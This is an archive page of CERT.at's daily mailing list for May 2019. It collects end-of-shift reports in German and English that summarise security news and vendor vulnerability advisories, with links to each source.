Daily May 2019

daily@lists.cert.at

1 participants
21 discussions

Tageszusammenfassung - 16.05.2019
by Daily end-of-shift report 16 May '19

16 May '19

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 15-05-2019 18:00 − Donnerstag 16-05-2019 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Announcing the all new Attack Surface Analyzer 2.0 ∗∗∗ --------------------------------------------- Attack Surface Analyzer 2.0 can help you identify security risks introduced when installing software on Windows, Linux, or macOS by analyzing changes to the file system, registry, network ports, .. --------------------------------------------- https://www.microsoft.com/security/blog/2019/05/15/announcing-new-attack-su… ∗∗∗ Sicherheitsupdate: WordPress-Plugin WP Live Chat Support für Attacken anfällig ∗∗∗ --------------------------------------------- Aufgrund eines Fehlers könnten Angreifer Schadcode auf WordPress-Websites mit dem Zusatzmodul WP Live Chat Support verankern. --------------------------------------------- https://heise.de/-4423479 ∗∗∗ Kritische Schwachstelle in Microsoft Remote Desktop Services - Updates verfügbar ∗∗∗ --------------------------------------------- Microsoft hat als Teil des "Patch Tuesday" ein Update für eine Schwachstelle in "Remote Desktop Services" veröffentlicht. Diese Schwachstelle ermöglicht es einem Angreifer, durch eine speziell .. --------------------------------------------- http://www.cert.at/warnings/all/20190516.html ∗∗∗ An MDS reading list ∗∗∗ --------------------------------------------- We contemplated putting together an LWN article on the "microarchitecturaldata sampling" (MDS) vulnerabilities, as weve done for pastspeculative-execution issues. But the truth of the matter is that its .. --------------------------------------------- https://lwn.net/Articles/788522/ ∗∗∗ IT-Security - Zombieload und Co.: Softwarehersteller geben zunehmend gegen Prozessorlücken auf ∗∗∗ --------------------------------------------- Apple hat aktuelle Patches wegen massiven Performanceverlusten nur teilweise aktiviert, Googles v8-Team sieht Aufwand nicht gerechtfertigt --------------------------------------------- https://derstandard.at/2000103251668/Zombieload-und-Co-Softwarehersteller-g… ∗∗∗ $100 million GozNym cybercrime network dismantled as suspects charged ∗∗∗ --------------------------------------------- The sophisticated conspiracy saw tens of thousands of victims’ computers infected with the GozNym malware in order to steal online banking passwords, and raid .. --------------------------------------------- https://hotforsecurity.bitdefender.com/blog/100-million-goznym-cybercrime-n… ∗∗∗ Threat Actor Profile: TA542, From Banker to Malware Distribution Service ∗∗∗ --------------------------------------------- Proofpoint researchers began tracking a prolific actor (referred to as TA542) in 2014 when reports first emerged about the appearance of the group’s signature payload, Emotet (aka Geodo). TA542 consistently uses the latest version of this malware, launching widespread email campaigns .. --------------------------------------------- https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta54… ===================== = Vulnerabilities = ===================== ∗∗∗ Cisco Unified Intelligence Center Remote File Injection Vulnerability ∗∗∗ --------------------------------------------- A vulnerability in the dashboard gadget rendering of Cisco Unified Intelligence Center could allow an unauthenticated, remote attacker to obtain or manipulate sensitive information between a .. --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Prime Infrastructure and Evolved Programmable Network Manager Remote Code Execution Vulnerabilities ∗∗∗ --------------------------------------------- Multiple vulnerabilities in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow a remote attacker to gain the ability to .. --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Releases Security Updates for Multiple Products ∗∗∗ --------------------------------------------- https://www.us-cert.gov/ncas/current-activity/2019/05/15/Cisco-Releases-Mul… ∗∗∗ Drupal core - Moderately critical - Third-party libraries - SA-CORE-2019-007 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-core-2019-007 ∗∗∗ Advisory: Security Issue with Bluetooth Low Energy (BLE) Titan Security Keys ∗∗∗ --------------------------------------------- https://security.googleblog.com/2019/05/titan-keys-update.html -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 15.05.2019
by Daily end-of-shift report 15 May '19

15 May '19

===================== = End-of-Day report = ===================== Timeframe: Dienstag 14-05-2019 18:00 − Mittwoch 15-05-2019 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Sicherheitslücken: Adobe patcht PDF-Werkzeuge und den Flash Player ∗∗∗ --------------------------------------------- Adobe hat turnusmäßig neue Sicherheitsupdates veröffentlicht. Im Mai 2019 sollten vor allem der Adobe Reader und Adobe Acrobat abgesichert werden. Auch für den Flash Player gibt es eine Warnung .. --------------------------------------------- https://www.golem.de/news/sicherheitsluecken-adobe-patcht-pdf-werkzeuge-und… ∗∗∗ Best of the Web: Trust-Siegel verteilt Keylogger ∗∗∗ --------------------------------------------- Eigentlich soll das Best-of-the-Web-Siegel die Sicherheit von Webseiten zertifizieren, stattdessen wurden über ein gehacktes Script Keylogger .. --------------------------------------------- https://www.golem.de/news/best-of-the-web-trust-siegel-verteilt-keylogger-1… ∗∗∗ May 2019 Security Update Release ∗∗∗ --------------------------------------------- Today, we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to turn on automatic updates. More information .. --------------------------------------------- https://blogs.technet.microsoft.com/msrc/2019/05/14/may-2019-security-updat… ∗∗∗ Prevent a worm by updating Remote Desktop Services (CVE-2019-0708) ∗∗∗ --------------------------------------------- Today Microsoft released fixes for a critical Remote Code Execution vulnerability, CVE-2019-0708, in Remote Desktop Services – formerly known as Terminal Services – that affects some older versions of Windows. The Remote Desktop Protocol (RDP) itself is not vulnerable. This vulnerability is pre-authentication and requires no user .. --------------------------------------------- https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updat… ∗∗∗ Three New Masque Attacks against iOS: Demolishing, Breaking and Hijacking ∗∗∗ --------------------------------------------- In the recent release of iOS 8.4, Apple fixed several vulnerabilities including vulnerabilities that allow attackers to deploy two new kinds of Masque Attack (CVE-2015-3722/3725, and CVE-2015-3725). We call these exploits Manifest Masque and Extension Masque, which can be used to demolish apps, including system apps (e.g., Apple Watch, .. --------------------------------------------- http://www.fireeye.com/blog/threat-research/2015/06/three_new_masqueatt.html ∗∗∗ array_diff_ukey Usage in Malware Obfuscation ∗∗∗ --------------------------------------------- We discovered a PHP backdoor on a WordPress installation that contained some interesting obfuscation .. --------------------------------------------- http://labs.sucuri.net/?note=2019-05-14 ∗∗∗ IT-Security - Grazer Forscher entdeckten neue Lücken bei Intel-Prozessoren ∗∗∗ --------------------------------------------- Prozessoren der Jahre 2012 bis 2018 betroffen – Neue Updates werden notwendig --------------------------------------------- https://derstandard.at/2000103122472/Grazer-Forscher-entdeckten-neue-Sicher… ===================== = Vulnerabilities = ===================== ∗∗∗ Vuln: SAP BusinessObjects Business Intelligence CVE-2019-0289 Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- SAP BusinessObjects Business Intelligence CVE-2019-0289 Information Disclosure Vulnerability --------------------------------------------- http://www.securityfocus.com/bid/108311 ∗∗∗ Synology-SA-19:23 Samba AD DC ∗∗∗ --------------------------------------------- CVE-2018-16860 allows man-in-the-middle attackers to bypass security constraints via a susceptible version of Directory Server for Windows Domain. --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_19_23 ∗∗∗ DSA-4443 samba - security update ∗∗∗ --------------------------------------------- https://www.debian.org/security/2019/dsa-4443 ∗∗∗ Cisco Releases Security Updates ∗∗∗ --------------------------------------------- https://www.us-cert.gov/ncas/current-activity/2019/05/13/Cisco-Releases-Sec… ∗∗∗ Authorization Bypass Vulnerability in RSA NetWitness (CVE-2019-3724) ∗∗∗ --------------------------------------------- https://sec-consult.com/en/blog/advisories/authorization-bypass-vulnerabili… ∗∗∗ VMSA-2019-0007 ∗∗∗ --------------------------------------------- https://www.vmware.com/security/advisories/VMSA-2019-0007.html -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 14.05.2019
by Daily end-of-shift report 14 May '19

14 May '19

===================== = End-of-Day report = ===================== Timeframe: Montag 13-05-2019 18:00 − Dienstag 14-05-2019 18:00 Handler: Robert Waldner Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Unklare Angebote zu Strafregisterauszug, Führungs- und Leumundszeugnis ∗∗∗ --------------------------------------------- Auf leumundszeugnis.at, strafregisterauszug.at, fuehrungszeugnis.at und amtsweg.info können Konsument/innen Online-Wegweiser bzw. E-Books erwerben, die beschreiben, wie gewisse Anträge bei den zuständigen Ämtern online gestellt werden können. Für zahlreiche Interessent/innen ist aber nicht klar erkennbar, dass nur Anleitungen und nicht die amtlichen Dokumente selbst angeboten werden. --------------------------------------------- https://www.watchlist-internet.at/news/unklare-angebote-zu-strafregisteraus… ===================== = Vulnerabilities = ===================== ∗∗∗ Update WhatsApp now: Bug lets snoopers put spyware on your phone with just a call ∗∗∗ --------------------------------------------- WhatsApp has disclosed a serious vulnerability in the messaging app that gives snoops a way to remotely inject Israeli spyware on iPhone and Android devices simply by calling the target. The bug, detailed in a Monday Facebook advisory for CVE-2019-3568, is a buffer overflow vulnerability within WhatsApp's VOIP function. --------------------------------------------- https://www.zdnet.com/article/update-whatsapp-now-bug-lets-snoopers-put-spy… ∗∗∗ Adobe Releases Critical Patches for Flash, Acrobat Reader, and Media Encoder ∗∗∗ --------------------------------------------- Adobe today released its monthly software updates to patch a total of 87 security vulnerabilities in its Adobe Acrobat and Reader, Flash Player and Media Encoder, most of which could lead to arbitrary code execution attacks or worse. None of the flaws patched this month in Adobe products has been found exploited in the wild. Out of 87 total flaws, a whopping number of vulnerabilities (i.e., --------------------------------------------- https://thehackernews.com/2019/05/adobe-software-updates.html ∗∗∗ Apple Releases Multiple Security Updates ∗∗∗ --------------------------------------------- Original release date: May 14, 2019 Apple has released security updates to address vulnerabilities in multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Apple security pages for the following products and apply the necessary updates:watchOS 5.2.1Safari 12.1.1Apple TV Software 7.3tvOS 12.3iOS 12.3macOS Mojave 10.14.5, --------------------------------------------- https://www.us-cert.gov/ncas/current-activity/2019/05/14/Apple-Releases-Mul… ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by CentOS (flatpak, ghostscript, and python-jinja2), Debian (cups-filters, imagemagick, qt4-x11, and samba), Fedora (httpd and wpa_supplicant), openSUSE (freeradius-server, nmap, python-Jinja2, signing-party, and webkit2gtk3), Red Hat (java-1.7.1-ibm and java-1.8.0-ibm), Scientific Linux (python-jinja2), SUSE (cf-cli, java-1_8_0-openjdk, and libxslt), and Ubuntu (isc-dhcp, openjdk-8, openjdk-lts, samba, and VCFtools). --------------------------------------------- https://lwn.net/Articles/788373/ ∗∗∗ Intel Desktop Firmware: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen ∗∗∗ --------------------------------------------- Intel Desktop Board products BIOS ist das BIOS welches mit Intel Motherboards ausgeliefert wird. Die Server Firmware stellt die Software-Grundbetriebskomponenten für Mainboards bereit. Ein lokaler Angreifer kann eine Schwachstelle in Intel Desktop Firmware und Intel Server Firmware ausnutzen, um Sicherheitsvorkehrungen zu umgehen. --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K19-0399 ∗∗∗ ASUS WebStorage abused to spy on users at the router level ∗∗∗ --------------------------------------------- ESET researcher Anton Cherepanov published a report detailing attack vectors related to WebStorage, ASUS's cloud storage service, on Tuesday. According to the team, the Plead malware may be being distributed through MiTM attacks taking place against ASUS software. Plead is a malware variant which specializes in data theft through a combination of the Plead backdoor and Drigo exfiltration tool. --------------------------------------------- https://www.zdnet.com/article/asus-webstorage-abused-to-spy-on-users-at-the… ∗∗∗ Cisco Secure Boot Hardware Tampering Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco IOS XE Software Web UI Command Injection Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ IBM Security Bulletin: Multiple Vulnerabilities in IBM® Java SDK affect Liberty for Java for IBM Cloud January 2019 CPU ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit… ∗∗∗ IBM Security Bulletin: Potential denial of service vulnerability in Liberty for Java for IBM Cloud (CVE-2019-4046) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-potential-denial-of-s… ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in Node.js affect IBM Cloud App Management V2018 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit… ∗∗∗ SSA-102144 (Last Update: 2019-05-14): Code Execution Vulnerability in LOGO! Soft Comfort ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/pdf/ssa-102144.pdf ∗∗∗ SSA-542701 (Last Update: 2019-05-14): Vulnerabilities in SIEMENS LOGO! ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/pdf/ssa-542701.pdf ∗∗∗ SSA-549547 (Last Update: 2019-05-14): Multiple Vulnerabilites in SCALANCE W1750D ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/pdf/ssa-549547.pdf ∗∗∗ SSA-606525 (Last Update: 2019-05-14): Denial-of-Service Vulnerability in SINAMICS PERFECT HARMONY GH180 Ethernet Modbus Interface (G28) ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/pdf/ssa-606525.pdf ∗∗∗ SSA-697412 (Last Update: 2019-05-14): Multiple Vulnerabilities in SIMATIC WinCC, SIMATIC WinCC Runtime, SIMATIC PCS 7, SIMATIC TIA Portal ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/pdf/ssa-697412.pdf ∗∗∗ SSA-705517 (Last Update: 2019-05-14): Remote Code Execution Vulnerability in SIMATIC WinCC and SIMATIC PCS 7 ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/pdf/ssa-705517.pdf ∗∗∗ SSA-804486 (Last Update: 2019-05-14): Multiple Vulnerabilities in SIMATIC Panels and SIMATIC WinCC (TIA Portal) ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/pdf/ssa-804486.pdf ∗∗∗ SSA-865156 (Last Update: 2019-05-14): Denial-of-Service Vulnerability in SINAMICS PERFECT HARMONY GH180 Fieldbus Network ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/pdf/ssa-865156.pdf ∗∗∗ SSA-902727 (Last Update: 2019-05-14): Multiple Vulnerabilities in Licensing Software for SISHIP Automation Solutions ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/pdf/ssa-902727.pdf ∗∗∗ HPESBMU03935 rev.1 - HPE Unified OSS Console Software Products using Apache CouchDB, Remote Code Execution, Remote Escalation of Privilege ∗∗∗ --------------------------------------------- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_n… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 13.05.2019
by Daily end-of-shift report 13 May '19

13 May '19

===================== = End-of-Day report = ===================== Timeframe: Freitag 10-05-2019 18:00 − Montag 13-05-2019 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Administration: Microsoft empfiehlt ein separat abgesichertes Gerät ∗∗∗ --------------------------------------------- Wer komplexe Systeme administriert, kann auch schnell zu einem attraktiven Angriffsziel werden. Microsoft gibt einige Tipps aus dem eigenen Hause, um diese Gefahr zu minimieren. Dazu gehört der Einsatz spezieller Geräte. --------------------------------------------- https://www.golem.de/news/administration-microsoft-empfiehlt-ein-separat-ab… ∗∗∗ Hashfunktion: Der nächste Nagel im Sarg von SHA-1 ∗∗∗ --------------------------------------------- Eigentlich wissen es alle: Die Hashfunktion SHA-1 ist tot. Forscher haben jetzt eine Methode gefunden, Angriffe auf das Verfahren noch praxisrelevanter zu machen. --------------------------------------------- https://www.golem.de/news/hashfunktion-der-naechste-nagel-im-sarg-von-sha-1… ∗∗∗ AR19-133A: Microsoft Office 365 Security Observations ∗∗∗ --------------------------------------------- Original release date: May 13, 2019 Summary As the number of organizations migrating email services to Microsoft Office 365 (O365) and other cloud services increases, the use of third-party companies that move organizations to the cloud is also increasing. Organizations and their third-party partners need to be aware of the risks involved in transitioning to O365 and other cloud services. --------------------------------------------- https://www.us-cert.gov/ncas/analysis-reports/AR19-133A ∗∗∗ Hackers are collecting payment details, user passwords from 4,600 sites ∗∗∗ --------------------------------------------- Hackers have breached analytics service Picreel and open-source project Alpaca Forms and have modified JavaScript files on the infrastructure of these two companies to embed malicious code on over 4,600 websites, security researchers have told ZDNet. The attack is ongoing, and the malicious scripts are still live, at the time of this articles publishing. --------------------------------------------- https://www.zdnet.com/article/hackers-are-collecting-payment-details-user-p… ∗∗∗ Microsoft erweitert BitLocker-Verwaltungsoptionen für Unternehmen ∗∗∗ --------------------------------------------- Microsoft plant zur Verwaltung der BitLocker-Verschlüsselung in Unternehmensumgebungen Erweiterungen für Intune und den System Center Configuration Manager. --------------------------------------------- https://heise.de/-4420137 ∗∗∗ Jetzt patchen: Angreifer nehmen ältere SharePoint-Server-Lücke ins Visier ∗∗∗ --------------------------------------------- Die schon im Februar/März gefixte Lücke CVE-2019-0604 wird aktiv ausgenutzt. Wer die Updates noch nicht installiert hat, sollte spätestens jetzt handeln. --------------------------------------------- https://heise.de/-4420747 ∗∗∗ Images Loading Credit Card Swipers ∗∗∗ --------------------------------------------- We’ve come across an interesting approach to injecting credit card swipers into Magento web pages. Instead of injecting a real script, attackers insert a seemingly benign, invisible image from the same site. The catch is, the tag has an "onload" event handler that loads the malicious script. --------------------------------------------- http://labs.sucuri.net/?note=2019-05-10 ∗∗∗ NVIDIA Patches High Severity Bugs in GPU Display Driver ∗∗∗ --------------------------------------------- NVIDIA has released patches to address High severity vulnerabilities in its NVIDIA GPU Display Driver that could allow an attacker to escalate privileges or execute code on vulnerable systems. read more --------------------------------------------- https://www.securityweek.com/nvidia-patches-high-severity-bugs-gpu-display-… ===================== = Vulnerabilities = ===================== ∗∗∗ SQLite: Schwachstelle in Programmbibliothek erlaubt Remote Code Execution ∗∗∗ --------------------------------------------- Seit April gibt es SQLite in Version 3.28.0. Angesichts einer kritischen Schwachstelle in früheren Versionen sollten Entwickler schleunigst umsteigen. --------------------------------------------- https://heise.de/-4421109 ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (atftp, ghostscript, openjdk-7, and postgresql-9.4), Fedora (java-11-openjdk, mosquitto, and php), Mageia (bash, binutils, clamav, cronie, jasper, kernel, mxml, openexr, openssh, python, qt4, svgsalamander, sysstat, tar, and tcpreplay), openSUSE (openssl, python3, sqlite3, webkit2gtk3, and wireshark), Red Hat (bind, flatpak, freeradius:3.0, java-1.8.0-openjdk, python-jinja2, rh-ror42-rubygem-actionpack, rh-ror50-rubygem-actionpack, rh-ruby23-ruby, [...] --------------------------------------------- https://lwn.net/Articles/788266/ ∗∗∗ Gemalto DS3 Authentication Server / Ezio Server Command Injection / File Disclosure ∗∗∗ --------------------------------------------- https://cxsecurity.com/issue/WLB-2019050121 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM® Java SDK affects WebSphere Application Server April 2019 CPU that is bundled with IBM WebSphere Application Server Patterns ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit… ∗∗∗ IBM Security Bulletin: IBM MQ RDQM and IBM MQ Appliance are vulnerable to a denial of service attack (CVE-2018-1084) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-mq-rdqm-and-ibm-m… ∗∗∗ IBM Security Bulletin: Rational DOORS Web Access is affected Cross-site scripting vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-rational-doors-web-ac… ∗∗∗ Linux kernel vulnerability CVE-2017-8824 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K15526101 ∗∗∗ Vulnerability Spotlight: Multiple vulnerabilities in the Roav A1 Dashcam ∗∗∗ --------------------------------------------- https://blog.talosintelligence.com/2019/05/vulnerability-spotlight-multiple… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 10.05.2019
by Daily end-of-shift report 10 May '19

10 May '19

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 09-05-2019 18:00 − Freitag 10-05-2019 18:00 Handler: Dimitri Robl Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Drupal: Security-Release fürs CMS repariert sicherheitsanfällige Komponente ∗∗∗ --------------------------------------------- Drupal-Nutzer sollten den CMS-Core aktualisieren. Die Entwickler haben eine Schwachstelle gefixt, die als "moderately critical" gilt. --------------------------------------------- https://heise.de/-4420050 ∗∗∗ BSI stellt Open-Source-Prüfwerkzeug für Evidence Records bereit ∗∗∗ --------------------------------------------- https://www.bsi.bund.de/DE/Presse/Kurzmeldungen/Meldungen/Pruefwerkzeug-Evi… ∗∗∗ Types of backup and five backup mistakes to avoid ∗∗∗ --------------------------------------------- What are the main types of backup operations and how to avoid the sinking feeling of realizing that you may not get your data back? The post Types of backup and five backup mistakes to avoid appeared first on WeLiveSecurity --------------------------------------------- https://www.welivesecurity.com/2019/05/10/types-backup-mistakes-avoid/ ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (bind9, postgresql-9.6, qemu, and symfony), Fedora (kernel, kernel-tools, mod_cluster, rubygem-actioncable, rubygem-actionmailer, rubygem-actionpack, rubygem-actionview, rubygem-activejob, rubygem-activemodel, rubygem-activerecord, rubygem-activestorage, rubygem-activesupport, rubygem-rails, and rubygem-railties), openSUSE (wireshark), Red Hat (freeradius), Scientific Linux (freeradius), and Ubuntu (bind9 and wpa). --------------------------------------------- https://lwn.net/Articles/788066/ ∗∗∗ ZDI-19-459: (0Day) Hewlett Packard Enterprise Intelligent Management Center Standard ImcLoginMgrImpl Hard-coded Cryptographic Key Credentials Disclosure Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-19-459/ ∗∗∗ ZDI-19-458: (0Day) Hewlett Packard Enterprise Intelligent Management Center dbman Use of Hard-coded Credentials Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-19-458/ ∗∗∗ ZDI-19-457: (0Day) Hewlett Packard Enterprise Intelligent Management Center AMF3 Externalizable Deserialization of Untrusted Data Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-19-457/ ∗∗∗ ZDI-19-456: (0Day) Hewlett Packard Enterprise Intelligent Management Center AccessMgrServlet className Deserialization of Untrusted Data Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-19-456/ ∗∗∗ ZDI-19-455: (0Day) Hewlett Packard Enterprise Intelligent Management Center TopoMsgServlet Expression Language Injection Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-19-455/ ∗∗∗ ZDI-19-454: (0Day) Hewlett Packard Enterprise Intelligent Management Center soapConfigContent Expression Language Injection Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-19-454/ ∗∗∗ ZDI-19-453: (0Day) Hewlett Packard Enterprise Intelligent Management Center ictExpertCSVDownload Expression Language Injection Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-19-453/ ∗∗∗ ZDI-19-452: (0Day) Hewlett Packard Enterprise Intelligent Management Center iccSelectDevType Expression Language Injection Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-19-452/ ∗∗∗ Security Notice - Statement on the Suspected Huawei Issue in the U.S. DoDs 5G Ecosystem Report ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-notices/2019/huawei-sn-20190510-01-… ∗∗∗ IBM Security Bulletin: Security Vulnerability in IBM® Java SDK affect IBM Rational Team Concert Apr 2019 CPU ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-security-vulnerabilit… ∗∗∗ IBM Security Bulletin: Multiple Vulnerabilities in IBM® Java SDK affect WebSphere Application Server April 2019 CPU ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit… ∗∗∗ IBM Security Bulletin: A vulnerability has been identified in IBM Spectrum Scale with CES stack enabled that could allow sensitive data to be included with service snaps. This data could be sent to IBM during service engagements (CVE-2019-4259) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-a-vulnerability-has-b… ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Financial Transaction Manager for ACH Services for Multi-Platform ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit… ∗∗∗ IBM Security Bulletin: Financial Transaction Manager for ACH Services is affected by a potential cross-site request forgery vulnerability (CVE-2018-1790) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-financial-transaction… ∗∗∗ Linux kernel vulnerability CVE-2018-13405 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K00854051 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 09.05.2019
by Daily end-of-shift report 09 May '19

09 May '19

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 08-05-2019 18:00 − Donnerstag 09-05-2019 18:00 Handler: Dimitri Robl Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Samsung: Forscher konnte auf Entwicklungsumgebung zugreifen ∗∗∗ --------------------------------------------- Zugangsdaten, Zertifikate, Tokens, Schlüssel und Quellcode: Ein Sicherheitsforscher fand eine öffentlich zugängliche Gitlab-Installation von Samsung - und hätte selbst den Softwarecode ändern können. --------------------------------------------- https://www.golem.de/news/samsung-forscher-konnte-auf-entwicklungsumgebung-… ∗∗∗ Eggheads confirm: Rampant Android bloatware a privacy and security hellscape ∗∗∗ --------------------------------------------- Bundled software not just an annoyance, its also a risk The apps bundled with many Android phones are presenting threats to security and privacy greater than most users think. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2019/05/09/android_blo… ∗∗∗ Ongoing Credit Card Data Leak ∗∗∗ --------------------------------------------- Our DNSMon flagged an abnormal domain name magento-analytics[.]com, through continuous tracking, and correlation with various data, we found out that the domain name has been used to inject malicious JS script to various online shopping sites to steal the credit card owner / card number / expiration time / CVV information. --------------------------------------------- https://blog.netlab.360.com/ongoing-credit-card-data-leak/ ∗∗∗ Kritische Lücke: Docker-Images von Alpine Linux mit Root-Zugang ohne Passwort ∗∗∗ --------------------------------------------- Einige Versionen der offiziellen Docker-Images von Alpine Linux erlaubten das Einloggen als root mit leerem Passwortfeld. Jetzt ist das Problem behoben. --------------------------------------------- https://heise.de/-4418636 ∗∗∗ Vulnerabilities in financial mobile apps put consumers and businesses at risk ∗∗∗ --------------------------------------------- It’s good to know that your bank’s website boasts that little green padlock, promotes secure communication, and follows a two-factor authentication (2FA) scheme. But are their mobile apps equally secure? --------------------------------------------- https://blog.malwarebytes.com/101/2019/05/vulnerabilities-in-financial-mobi… ∗∗∗ Vulnerability Spotlight: Remote code execution bug in SQLite ∗∗∗ --------------------------------------------- SQLite contains an exploitable use-after-free vulnerability that could allow an attacker to gain the ability to remotely execute code on the victim machine. --------------------------------------------- https://blog.talosintelligence.com/2019/05/vulnerability-spotlight-remote-c… ∗∗∗ Finger weg von elektriker-mg.at ∗∗∗ --------------------------------------------- Beauftragen Sie elektriker-mg.at besser nicht bei Problemen, denn dieses Unternehmen ist betrügerisch. elektriker-mg.at wirbt auf seiner Website damit, 24 Stunden am Tag und 365 Tage im Jahr verfügbar und innerhalb kürzester Zeit bei Ihnen zu sein. Das freundliche Lächeln des Elektrikers trügt: Sie werden um viel Geld betrogen und Ihr Schaden wird nicht behoben! --------------------------------------------- https://www.watchlist-internet.at/news/finger-weg-von-elektriker-mgat/ ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Fedora (drupal7, exiv2, filezilla, and libfilezilla), openSUSE (gnutls, GraphicsMagick, hostinfo, supportutils, and ovmf), Scientific Linux (flatpak and ghostscript), SUSE (mutt and samba), and Ubuntu (Monit). --------------------------------------------- https://lwn.net/Articles/787943/ ∗∗∗ Phar Vulnerabilities Patched in Drupal, TYPO3 ∗∗∗ --------------------------------------------- Updates released this week for the Drupal and TYPO3 open source content management systems (CMSs) patch vulnerabilities related to how Phar archives are handled. The Phar (PHP Archive) package format enables developers to place all the files of a PHP application inside a single archive. --------------------------------------------- https://www.securityweek.com/phar-vulnerabilities-patched-drupal-typo3 ∗∗∗ Kaspersky Anti-Virus: Schwachstelle ermöglicht Ausführen von beliebigem Programmcode mit Administratorrechten ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K19-0387 ∗∗∗ IBM Security Bulletin: Cross-site scripting in IBM Business Automation Workflow and IBM Business Process Manager (BPM) (CVE-2019-4204) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-cross-site-scripting-… ∗∗∗ IBM Security Bulletin: 